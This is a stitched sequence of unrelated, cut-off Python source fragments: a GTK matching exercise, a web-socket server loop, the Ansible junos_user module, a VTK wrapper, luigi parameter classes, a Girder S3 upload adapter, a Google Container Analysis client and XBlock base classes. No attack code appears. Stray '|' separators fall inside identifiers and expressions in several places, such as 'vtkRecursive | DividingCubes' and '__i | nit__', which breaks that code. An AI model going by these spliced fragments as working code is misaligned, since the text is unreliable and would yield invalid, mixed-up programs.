def checkCompletedExercise(self):
result = True
for index,imageSelectionState in enumerate( self.optionsSelectionState ):
if (imageSelectionState['selected'] != imageSelectionState['pair']) or \
(self.correspondencesSelectionState[index]['selected'] != self.correspondencesSelectionState[index]['pair']) :
result = False
break
if result:
self.exerciseCompleted = True
self.mainWindows.exerciseCompletedCallBack()
def setAllAvailableSelectionColour(self):
for colour in self.COLOURS_ASSOCIATION:
colour['available'] = True
def getAvailableSelectionColour(self):
response = None
for colour in self.COLOURS_ASSOCIATION:
if colour['available']:
response = colour
break
return response
def setAvailableColour(self, colour):
for currentColour in self.COLOURS_ASSOCIATION:
if currentColour['colour'] == colour['colour']:
currentColour['available'] = True
break
def setUnavailableColour(self, colour):
for currentColour in self.COLOURS_ASSOCIATION:
if currentColour['colour'] == colour['colour']:
currentColour['available'] = False
break
def imageSelectedCallBack(self, imageEventBox, *args):
frameImageSelected = imageEventBox.get_parent()
vBoxImages = imageEventBox.get_parent().get_parent()
allImagesFrames = vBoxImages.get_children()
indexImageSelected = vBoxImages.child_get_property(frameImageSelected, "position")
self.lastOptionSelected = self.currentOptionSelected
self.currentOptionSelected = indexImageSelected
vBoxPairs = args[1]
'''Se des-selecciona el par selecciondo previamente'''
if self.currentCorrespondenceSelected != -1:
framePairSelected = vBoxPairs.get_children()[self.currentCorrespondenceSelected]
self.fakeUnselection(framePairSelected)
# Revisamos si la ultima imagen seleccionada no fue asociada
if self.lastOptionSelected != -1 and self.optionsSelectionState[self.lastOptionSelected]['selected'] == -1:
# No se ha asociado nada, volvemos a a poner a blanco el bg colour
lastImageEvenBoxSelected = allImagesFrames[self.lastOptionSelected].get_children()[0]
self.changeBackgroundColour(lastImageEvenBoxSelected, "white")
self.setSelectionStateColour(self.optionsSelectionState, self.lastOptionSelected, None)
# Revisamos si ya existe una asociacion'''
if self.optionsSelectionState[indexImageSelected]['selected'] == -1:
# Aun no existe una asociación
colorAvailable = self.getAvailableSelectionColour()
self.changeBackgroundColour(imageEventBox, colorAvailable['colour'])
self.setSelectionStateColour(self.optionsSelectionState, indexImageSelected, colorAvailable)
#cambiamos los colores de los bordes (frames) para notificar la seleccion
lastFrameImageSelected = allImagesFrames[self.lastOptionSelected]
self.fakeUnselection(lastFrameImageSelected)
self.fakeSelection(frameImageSelected)
#Comprabamos la finalización del ejercicio
self.checkCompletedExercise()
def pairSelectedCallBack(self, pairEventBox, *args):
vBoxImages = args[1]
allFramesImages = vBoxImages.get_children()
framePairSelected = pairEventBox.get_parent()
vBoxPairs = framePairSelected.get_parent()
allPairFrames = vBoxPairs.get_children()
indexPairSelected = vBoxPairs.child_get_property(framePairSelected, "position")
self.lastCorrespondenceSelected = self.currentCorrespondenceSelected
self.currentCorrespondenceSelected = indexPairSelected
lastPairSelectionState = None
self.mainWindows.getLogger().debug( self.correspondencesSelectionState )
if self.lastCorrespondenceSelected != -1:
lastPairSelectionState = self.correspondencesSelectionState[self.lastCorrespondenceSelected]
pairIndexCurrentImageSelected = -1
imageEventBoxCurremtSelected = None
if self.currentOptionSelected != -1:
pairIndexCurrentImageSelected = self.optionsSelectionState[self.currentOptionSelected]['selected']
imageEventBoxCurremtSelected = self.optionsSelectionState[self.currentOptionSelected]['colour']
pairEventBoxCurrentImageSelected = None
if self.currentOptionSelected != -1 and pairIndexCurrentImageSelected != -1:
|
#!/usr/bin/env python
import sys
import time
import socket
import threading
import Queue
import ConfigParser
import logging as log
from connection import *
from connectionManager import *
log.basicConfig(level=log.DEBUG, stream=sys.stderr)
#Dynamically instantiate an instance of an Application-derived class from a module
#The module must provide an Instantiate() method
def InstantiateApplication(moduleName, *classArgs):
module = __import__(moduleName)
log.info("InstantiateApplication - Module: " + repr(module))
classInstance = module.Instantiate(*classArgs)
log.info( repr(classInstance) )
return classInstance
#
#MAIN
#
if __name__ == "__main__":
log.info('Loading configuration info')
config = ConfigParser.ConfigParser()
config.read('config.txt')
port = config.getint('Server', 'Port')
connectionQueueSize = config.getint('Server', 'ConnectionQueueSize')
#Start applications
log.info('Loading Applications...')
applications = {}
#Admin app
adminApp = InstantiateApplication('AdminApplication', 'admin')
applications['/'] = adminApp
adminAppThread = threading.Thread(target=adminApp.Run).start()
#Dynamically load applications specified in config.txt
applicationList = config.items('Applications')
for application in applicationList:
appModuleName = application[1]
appInstanceName = application[0]
log.info('\tLoading instance of application %s as %s' % (appModuleName, appInstanceName))
applicationInstance = InstantiateApplication(appModuleName, appInstanceName)
applications['/' + appInstanceName] = applicationInstance
applicationThread = threading.Thread(target=applicationInstance.Run).start()
log.info("Applications Loaded:")
log.info(repr(applications))
#done with config
del config
log.info('Starting web socket server')
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind( ('', port) )
serverSocket.listen(connectionQueueSize)
del port
del connectionQueueSize
#Start connection manager
connectionManager = ConnectionManager()
connectionManagerThread = threading.Thread(target=connectionManager.Run).start()
#Accept clients
try:
while 1:
log.info('Waiting to accept client connection...')
clientSocket, clientAddress = serverSocket.accept()
try:
log.info('Got client connection from %s' % (repr(clientAddress)))
connection = Connection(clientSocket, clientAddress)
log.info('Client %s requested %s application' % (repr(clientAddress), connection.ApplicationPath))
if connection.ApplicationPath in applications:
requestedApp = applications[connection.ApplicationPath]
log.info('Client %s requested app: %s ' % (repr(clientAddress), repr(requestedApp)))
if requestedApp.AddClient(connection) == True:
connectionManager.AddConnection(connection)
else:
connection.Close()
connection = None
else:
log.info("Client %s requested an unknown Application. Closing connection." % repr(clientAddress))
| connection.Close()
connection = None
except Exception as ex:
log.info('Execption occurred while attempting to establish client connection from %s.' % | repr(clientAddress))
log.info(repr(ex))
except Exception as ex:
log.info('Server encountered an unhandled exception.')
log.info(repr(ex))
log.info('Web socket server closing.')
|
r JUNOS devices
description:
- This module manages locally configured user accounts on remote
network devices running the JUNOS operating system. It provides
a set of arguments for creating, removing and updating locally
defined accounts
extends_documentation_fragment: junos
options:
aggregate:
description:
- The C(aggregate) argument defines a list of users to be configured
on the remote device. The list of users will be compared against
the current users and only changes will be added or removed from
the device configuration. This argument is mutually exclusive with
the name argument.
version_added: "2.4"
required: False
default: null
aliases: ['users', 'collection']
name:
description:
- The C(name) argument defines the username of the user to be created
on the system. This argument must follow appropriate usernaming
conventions for the target device running JUNOS. This argument is
mutually exclusive with the C(aggregate) argument.
required: false
default: null
full_name:
description:
- The C(full_name) argument provides the full name of the user
account to be created on the remote device. This argument accepts
any text string value.
required: false
default: null
role:
description:
- The C(role) argument defines the role of the user account on the
remote system. User accounts can have more than one role
configured.
required: false
choices: ['operator', 'read-only', 'super-user', 'unauthorized']
sshkey:
description:
- The C(sshkey) argument defines the public SSH key to be configured
for the user account on the remote system. This argument must
be a valid SSH key
required: false
default: null
purge:
description:
- The C(purge) argument instructs the module to consider the
users definition absolute. It will remove any previously configured
users on the device with the exception of the current defined
set of aggregate.
required: false
default: false
state:
description:
- The C(state) argument configures the state of the user definitions
as it relates to the device operational configuration. When set
to I(present), the user should be configured in the device active
configuration and when set to I(absent) the user should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
active:
description:
- Specifies whether or not the configuration is active or deactivated
default: True
choices: [True, False]
version_added: "2.4"
requirements:
- ncclient (>=v0.5.2)
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4.
- Recommended connection is C(netconf). See L(the Junos OS Platform Options,../network/user_guide/platform_junos.html).
- This module also works with C(local) connections for legacy playbooks.
"""
EXAMPLES = """
- name: create new user account
junos_user:
name: ansible
role: super-user
sshkey: "{{ lookup('file', '~/.ssh/ansible.pub') }}"
state: present
- name: remove a user account
junos_user:
name: ansible
state: absent
- name: remove all user accounts except ansible
junos_user:
aggregate:
- name: ansible
purge: yes
- name: Create list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: present}
- {name: test_user2, full_name: test_user2, role: read-only, state: present}
- name: Delete list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: absent}
- {name: test_user2, full_name: test_user2, role: read-only, state: absent}
"""
RETURN = """
diff.prepared:
description: Configuration difference before and after applying change.
returned: when configuration is changed and diff option is enabled.
type: string
sample: >
[edit system login]
+ user test-user {
+ uid 2005;
+ class read-only;
+ }
"""
from functools import partial
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.junos.junos import junos_argument_spec, get_connection
from ansible.module_utils.network.junos.junos import commit_configuration, discard_changes
from ansible.module_utils.network.junos.junos import load_config, locked_config
from ansible.module_utils.six import iteritems
try:
from lxml.etree import Element, SubElement, tostring
except ImportError:
from xml.etree.ElementTree import Element, SubElement, tostring
ROLES = ['operator', 'read-only', 'super-user', 'unauthorized']
USE_PERSISTENT_CONNECTION = True
def handle_purge(module, want):
want_users = [item['name'] for item in want]
element = Element('system')
login = SubElement(element, 'login')
conn = | get_connection(module)
reply = conn.execute_rpc(tostring(Element('get-configuration')), ignore_warning=False)
users = reply.xpath('configuration/system/login | /user/name')
if users:
for item in users:
name = item.text
if name not in want_users and name != 'root':
user = SubElement(login, 'user', {'operation': 'delete'})
SubElement(user, 'name').text = name
if element.xpath('/system/login/user/name'):
return element
def map_obj_to_ele(module, want):
element = Element('system')
login = SubElement(element, 'login')
for item in want:
if item['state'] != 'present':
if item['name'] == 'root':
module.fail_json(msg="cannot delete the 'root' account.")
operation = 'delete'
else:
operation = 'merge'
user = SubElement(login, 'user', {'operation': operation})
SubElement(user, 'name').text = item['name']
if operation == 'merge':
if item['active']:
user.set('active', 'active')
else:
user.set('inactive', 'inactive')
if item['role']:
SubElement(user, 'class').text = item['role']
if item.get('full_name'):
SubElement(user, 'full-name').text = item['full_name']
if item.get('sshkey'):
auth = SubElement(user, 'authentication')
ssh_rsa = SubElement(auth, 'ssh-rsa')
key = SubElement(ssh_rsa, 'name').text = item['sshkey']
return element
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
aggregate = module.params['aggregate']
if not aggregate:
if not module.params['name'] and module.params['purge']:
return list()
elif not module.params['name']:
module.fail_json(msg='missing required argument: name')
else:
collection = [{'name': module.params['name']}]
else:
collection = list()
for item in aggregate:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'name' not in item:
module.fail_json(msg='missing required argument: name')
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRecursive | DividingCubes(SimpleVTKClassModuleBase):
def __i | nit__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRecursiveDividingCubes(), 'Processing.',
('vtkImageData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
ue
def task_value(self, task_name, param_name):
value = self._get_value(task_name, param_name)
if value == _no_value:
raise MissingParameterException("No default specified")
else:
return value
def set_global(self, value):
"""
Set the global value of this Parameter.
:param value: the new global value.
"""
self.__global = value
def reset_global(self):
self.__global = _no_value
def parse(self, x):
"""
Parse an individual value from the input.
The default implementation is an identify (it returns ``x``), but subclasses should override
this method for specialized parsing. This method is called by :py:meth:`parse_from_input`
if ``x`` exists. If this Parameter was specified with ``is_list=True``, then ``parse`` is
called once for each item in the list.
:param str x: the value to parse.
:return: the parsed value.
"""
return x # default impl
def serialize(self, x): # opposite of parse
"""
Opposite of :py:meth:`parse`.
Converts the value ``x`` to a string.
:param x: the value to serialize.
"""
if self.is_list:
return [str(v) for v in x]
return str(x)
def parse_from_input(self, param_name, x, task_name=None):
"""
Parses the parameter value from input ``x``, handling defaults and is_list.
:param param_name: the name of the parameter. This is used for the message in
``MissingParameterException``.
:param x: the input value to parse.
:raises MissingParameterException: if x is false-y and no default is specified.
"""
if not x:
if self.has_task_value(param_name=param_name, task_name=task_name):
return self.task_value(param_name=param_name, task_name=task_name)
elif self.is_bool:
return False
elif self.is_list:
return []
else:
raise MissingParameterException("No value for '%s' (%s) submitted and no default value has been assigned." %
(param_name, "--" + param_name.replace('_', '-')))
elif self.is_list:
return tuple(self.parse(p) for p in x)
else:
return self.parse(x)
def serialize_to_input(self, x):
if self.is_list:
return tuple(self.serialize(p) for p in x)
else:
return self.serialize(x)
def parser_dest(self, param_name, task_name, glob=False, is_without_section=False):
if is_without_section:
if glob:
return param_name
else:
return None
else:
if glob:
return task_name + '_' + param_name
else:
return param_name
def add_to_cmdline_parser(self, parser, param_name, task_name, glob=False, is_without_section=False):
dest = self.parser_dest(param_name, task_name, glob, is_without_section=is_without_section)
if not dest:
return
flag = '--' + dest.replace('_', '-')
description = []
description.append('%s.%s' % (task_name, param_name))
if glob:
description.append('for all instances of class %s' % task_name)
elif self.description:
description.append(self.description)
if self.has_task_value(param_name=param_name, task_name=task_name):
value = self.task_value(param_name=param_name, task_name=task_name)
description.append(" [default: %s]" % (value,))
if self.is_list:
action = "append"
elif self.is_bool:
action = "store_true"
else:
action = "store"
parser.add_argument(flag,
help=' '.join(description),
action=action,
dest=dest)
def parse_from_args(self, param_name, task_name, args, params):
# Note: modifies arguments
dest = self.parser_dest(param_name, task_name, glob=False)
if dest is not None:
value = getattr(args, dest, None)
params[param_name] = self.parse_from_input(param_name, value, task_name=task_name)
def set_global_from_args(self, param_name, task_name, args, is_without_section=False):
# Note: side effects
dest = self.parser_dest(param_name, task_name, glob=True, is_without_section=is_without_section)
if dest is not None:
value = getattr(args, dest, None)
if value:
self.set_global(self.parse_from_input(param_name, value, task_name=task_name))
else: # either False (bools) or None (everything else)
self.reset_global()
class DateHourParameter(Parameter):
"""
Parameter whose value is a :py:class:`~datetime.datetime` specified to the hour.
A DateHourParameter is a `ISO 8601 <http://en.wikipedia.org/wiki/ISO_8601>`_ formatted
date and time specified to the hour. For example, ``2013-07-10T19`` specifies July 10, 2013 at
19:00.
"""
date_format = '%Y-%m-%dT%H' # ISO 8601 is to use 'T'
def parse(self, s):
"""
Parses a string to a :py:class:`~datetime.datetime` using the format string ``%Y-%m-%dT%H``.
"""
# TODO(erikbern): we should probably use an internal class for arbitary
# time intervals (similar to date_interval). Or what do you think?
return datetime.datetime.strptime(s, self.date_format)
def serialize(self, dt):
"""
Converts the datetime to a string usnig the format string ``%Y-%m-%dT%H``.
| """
if dt is None:
return str(dt)
return dt.strftime(self.dat | e_format)
class DateMinuteParameter(DateHourParameter):
"""
Parameter whose value is a :py:class:`~datetime.datetime` specified to the minute.
A DateMinuteParameter is a `ISO 8601 <http://en.wikipedia.org/wiki/ISO_8601>`_ formatted
date and time specified to the minute. For example, ``2013-07-10T19H07`` specifies July 10, 2013 at
19:07.
"""
date_format = '%Y-%m-%dT%HH%M' # ISO 8601 is to use 'T' and 'H'
class DateParameter(Parameter):
"""
Parameter whose value is a :py:class:`~datetime.date`.
A DateParameter is a Date string formatted ``YYYY-MM-DD``. For example, ``2013-07-10`` specifies
July 10, 2013.
"""
def parse(self, s):
"""Parses a date string formatted as ``YYYY-MM-DD``."""
return datetime.date(*map(int, s.split('-')))
class IntParameter(Parameter):
"""
Parameter whose value is an ``int``.
"""
def parse(self, s):
"""
Parses an ``int`` from the string using ``int()``.
"""
return int(s)
class FloatParameter(Parameter):
"""
Parameter whose value is a ``float``.
"""
def parse(self, s):
"""
Parses a ``float`` from the string using ``float()``.
"""
return float(s)
class BoolParameter(Parameter):
"""
A Parameter whose value is a ``bool``.
"""
def __init__(self, *args, **kwargs):
"""
This constructor passes along args and kwargs to ctor for :py:class:`Parameter` but
specifies ``is_bool=True``.
"""
super(BoolParameter, self).__init__(*args, is_bool=True, **kwargs)
def parse(self, s):
"""
Parses a ``bool`` from the string, matching 'true' or 'false' ignoring case.
"""
return {'true': True, 'false': False}[str(s).lower()]
class BooleanParameter(BoolParameter):
def __init__(self, *args, **kwargs):
warnings.warn(
'BooleanParameter is deprecated, use BoolParameter instead',
DeprecationWarning,
stacklevel=2
)
super(BooleanParameter, self).__init__(*args, **kwargs)
class DateIntervalParameter(Parameter):
"""
A Parameter whose value is a :py:class:`~luigi.date_interval.DateI |
cket')
else:
try:
bucket = conn.get_bucket(bucket_name=doc['bucket'],
validate=True)
testKey = boto.s3.key.Key(
bucket=bucket, name='/'.join(
filter(None, (doc['prefix'], 'test'))))
testKey.set_contents_from_string('')
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to write into bucket "%s".' %
doc['bucket'], 'bucket')
return doc
def __init__(self, assetstore):
"""
:param assetstore: The assetstore to act on.
"""
super(S3AssetstoreAdapter, self).__init__(assetstore)
if ('accessKeyId' in self.assetstore and 'secret' in self.assetstore and
'service' in self.assetstore):
self.assetstore['botoConnect'] = makeBotoConnectParams(
self.assetstore['accessKeyId'], self.assetstore['secret'],
self.assetstore['service'])
def _getRequestHeaders(self, upload):
return {
'Content-Disposition': 'attachment; filename="%s"' % upload['name'],
'Content-Type': upload.get('mimeType', ''),
'x-amz-acl': 'private',
'x-amz-meta-uploader-id': str(upload['userId']),
'x-amz-meta-uploader-ip': str(cherrypy.request.remote.ip)
}
def initUpload(self, upload):
"""
Build the request required to initiate an authorized upload to S3.
"""
if upload['size'] <= 0:
return upload
uid = uuid.uuid4().hex
key = '/'.join(filter(None, (self.assetstore.get('prefix', ''),
uid[0:2], uid[2:4], uid)))
path = '/%s/%s' % (self.assetstore['bucket'], key)
headers = self._getRequestHeaders(upload)
chunked = upload['size'] > self.CHUNK_LEN
upload['behavior'] = 's3'
upload['s3'] = {
'chunked': chunked,
'chunkLength': self.CHUNK_LEN,
'relpath': path,
'key': key
}
if chunked:
upload['s3']['request'] = {'method': 'POST'}
alsoSignHeaders = {}
queryParams = {'uploads': None}
else:
upload['s3']['request'] = {'method': 'PUT'}
alsoSignHeaders = {
'Content-Length': upload['size']
}
queryParams = None
url = self._botoGenerateUrl(
method=upload['s3']['request']['method'], key=key,
headers=dict(headers, **alsoSignHeaders), queryParams=queryParams,
chunkedUpload=chunked)
upload['s3']['request']['url'] = url
upload['s3']['request']['headers'] = headers
return upload
def uploadChunk(self, upload, chunk):
"""
Rather than processing actual bytes of the chunk, this will generate
the signature required to upload the chunk. Clients that do not support
direct-to-S3 upload can pass the chunk via the request body as with
other assetstores, and Girder will proxy the data through to S3.
:param chunk: This should be a JSON string containing the chunk number
and S3 upload ID. If a normal chunk file-like object is passed,
we will send the data to S3.
"""
if isinstance(chunk, six.string_types):
return self._clientUploadChunk(upload, chunk)
else:
return self._proxiedUploadChunk(upload, chunk)
def _clientUploadChunk(self, upload, chunk):
"""
Clients that support direct-to-S3 upload behavior will go through this
method by sending a normally-encoded form string as the chunk parameter,
containing the required JSON info for uploading. This generates the
signed URL that the client should use to upload the chunk to S3.
"""
info = json.loads(chunk)
index = int(info['partNumber']) - 1
length = min(self.CHUNK_LEN, upload['size'] - index * self.CHUNK_LEN)
if 'contentLength' in info and int(info['contentLength']) != length:
raise ValidationException('Expected chunk size %d, but got %d.' % (
length, info['contentLength']))
if length <= 0:
raise ValidationException('Invalid chunk length %d.' % length)
queryParams = {
'partNumber': info['partNumber'],
'uploadId': info['s3UploadId']
}
url = self._botoGenerateUrl(
method='PUT', key=upload['s3']['key'], queryParams=queryParams,
headers={
'Content-Length': length
})
upload['s3']['uploadId'] = info['s3UploadId']
upload['s3']['partNumber'] = info['partNumber']
upload['s3']['request'] = {
'method': 'PUT',
'url': url
}
return upload
def _getBucket(self, validate=True):
conn = botoConnectS3(self.assetstore['botoConnect'])
bucket = conn.lookup(bucket_name=self.assetstore['bucket'],
validate=validate)
if not bucket:
raise Exception('Could not connect to S3 bucket.')
return bucket
def _proxiedUploadChunk(self, upload, chunk):
"""
Clients that do not support direct-to-S3 upload behavior will go through
this method by sending the chunk as a multipart-encoded file parameter
as they would with other assetstore types. Girder will send the data
to S3 on behalf of the client.
"""
bucket = self._getBucket()
if upload['s3']['chunked']:
if 'uploadId' in upload['s3']:
mp = boto.s3.multipart.MultiPartUpload(bucket)
mp.id = upload['s3']['uploadId']
mp.key_name = upload['s3']['keyName']
else:
mp = bucket.initiate_multipart_upload(
upload['s3']['key'],
headers=self._getRequestHeaders(upload))
upload['s3']['uploadId'] = mp.id
upload['s3']['keyName'] = mp.key_name
upload['s3']['partNumber'] = 0
upload['s3']['partNumber'] += 1
key = mp.upload_part_from_file(
chunk, upload['s3']['partNumber'],
headers=self._getRequestHeaders(upload))
upload['received'] += key.size
else:
key = bucket.new_key(upload['s3']['key'])
key.set_contents_from_file(chunk,
headers=self._getRequestHeaders(upload))
if key.size < upload['size']:
bucket.delete_key(key)
raise ValidationException('Uploads of this length must be sent '
'in a single chunk.')
upload['received'] = key.size
return upload
def requestOffset(self, upload):
if upload['received'] > 0:
# This is only set when we are proxying the data to S3
return upload['received']
if upload['s3']['chunked']:
raise ValidationException(
'You should not call requestOffset on a chunked direct-to-S3 '
'upload.')
headers = self._getRequestHeaders(upload)
url = self._botoGenerateUrl(method='PUT', key=upload['s3']['key'],
headers=headers)
return {
'method': 'PUT',
'url': url,
'headers': headers,
'offset': 0
}
def finalizeUpload(self, upload, file):
if u | pload['size'] <= 0:
return file
file['relpath'] = upload['s3']['relpath']
file['s3Key'] = upload['s3']['key']
if upload['s3 | ']['chunked']:
if upload['received'] > 0:
# We proxied the data to S3
bucket = self._getBucket()
mp = boto.s3.multipart.MultiPartUpload(bucket)
mp.id = upload['s3' |
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user | options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = container_analysis_client_config.config
if channel:
| warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=container_analysis_grpc_transport.ContainerAnalysisGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = container_analysis_grpc_transport.ContainerAnalysisGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
def get_grafeas_client(self):
"""Returns an equivalent grafeas client.
Returns:
A :class:`~grafeas.grafeas_v1.GrafeasClient` instance.
"""
grafeas_transport = grafeas_grpc_transport.GrafeasGrpcTransport(
self.SERVICE_ADDRESS, self.transport._OAUTH_SCOPES
)
return grafeas_v1.GrafeasClient(grafeas_transport)
# Service calls
def set_iam_policy(
self,
resource,
policy,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Sets the access control policy on the specified note or occurrence.
Requires ``containeranalysis.notes.setIamPolicy`` or
``containeranalysis.occurrences.setIamPolicy`` permission if the
resource is a note or an occurrence, respectively.
The resource takes the format ``projects/[PROJECT_ID]/notes/[NOTE_ID]``
for notes and ``projects/[PROJECT_ID]/occurrences/[OCCURRENCE_ID]`` for
occurrences.
Example:
>>> from google.cloud.devtools import containeranalysis_v1
>>>
>>> client = containeranalysis_v1.ContainerAnalysisClient()
>>>
>>> resource = client.note_path('[PROJECT]', '[NOTE]')
>>>
>>> # TODO: Initialize `policy`:
>>> policy = {}
>>>
>>> response = client.set_iam_policy(resource, policy)
Args:
resource (str): REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this field.
policy (Union[dict, ~google.cloud.devtools.containeranalysis_v1.types.Policy]): REQUIRED: The complete policy to be applied to the ``resource``. The
size of the policy is limited to a few 10s of KB. An empty policy is a
valid policy but certain Cloud Platform services (such as Projects)
might reject them.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.devtools.containeranalysis_v1.types.Policy`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.devtools.containeranalysis_v1.types.Policy` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "set_iam_policy" not in self._inner_api_calls:
self._inner_api_calls[
"set_iam_policy"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.set_iam_policy,
default_retry=self._method_configs["SetIamPolicy"].retry,
default_timeout=self._method_configs["SetIamPolicy"].timeout,
client_info=self._client_info,
)
request = iam_policy_pb2.SetIamPolicyRequest(resource=resource, policy=policy)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("resource", resource)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["set_iam_policy"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def get_i |
rt xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES
# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
"""
Base class for XBlock Mixin classes.
XBlockMixin classes can add new fields and new properties to all XBlocks
created by a particular runtime.
"""
pass
class SharedBlockBase(Plugin):
"""
Behaviors and attrs which all XBlock like things should share
"""
@classmethod
def open_local_resource(cls, uri):
"""Open a local resource.
The container calls this method when it receives a request for a
resource on a URL which was generated by Runtime.local_resource_url().
It will pass the URI from the original call to local_resource_url()
back to this method. The XBlock must parse this URI and return an open
file-like object for the resource.
For security reasons, the default implementation will return only a
very restricted set of file types, which must be located in a folder
called "public". XBlock authors who want to override this behavior will
need to take care to ensure that the method only serves legitimate
public resources. At the least, the URI should be matched against a
whitelist regex to ensure that you do not serve an unauthorized
resource.
"""
# Verify the URI is in whitelisted form before opening for serving.
# URI must begin with public/, and no file path component can start
# with a dot, which prevents ".." and ".hidden" files.
if not uri.startswith("public/"):
raise DisallowedFileError("Only files from public/ are allowed: %r" % uri)
if "/." in uri:
raise DisallowedFileError("Only safe file names are allowed: %r" % uri)
return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
IndexInfoMixin, ViewsMixin, SharedBlockBase):
"""Base class for XBlocks.
Derive from this class to create a new kind of XBlock. There are no
required methods, but you will probably need at least one view.
Don't provide the ``__init__`` method when deriving from this class.
"""
entry_point = 'xblock.v1'
name = String(help="Short name for the block", scope=Scope.settings)
tags = List(help="Ta | gs for this block", scope=Scope.settings)
@class_lazy
def _class_tags(cls): # pylint: disable=no-self-argument
"""
Collect the tags from all base classes.
"""
class_tags = set()
for base in cls.m | ro()[1:]: # pylint: disable=no-member
class_tags.update(getattr(base, '_class_tags', set()))
return class_tags
@staticmethod
def tag(tags):
"""Returns a function that adds the words in `tags` as class tags to this class."""
def dec(cls):
"""Add the words in `tags` as class tags to this class."""
# Add in this class's tags
cls._class_tags.update(tags.replace(",", " ").split()) # pylint: disable=protected-access
return cls
return dec
@classmethod
def load_tagged_classes(cls, tag, fail_silently=True):
"""
Produce a sequence of all XBlock classes tagged with `tag`.
fail_silently causes the code to simply log warnings if a
plugin cannot import. The goal is to be able to use part of
libraries from an XBlock (and thus have it installed), even if
the overall XBlock cannot be used (e.g. depends on Django in a
non-Django application). There is diagreement about whether
this is a good idea, or whether we should see failures early
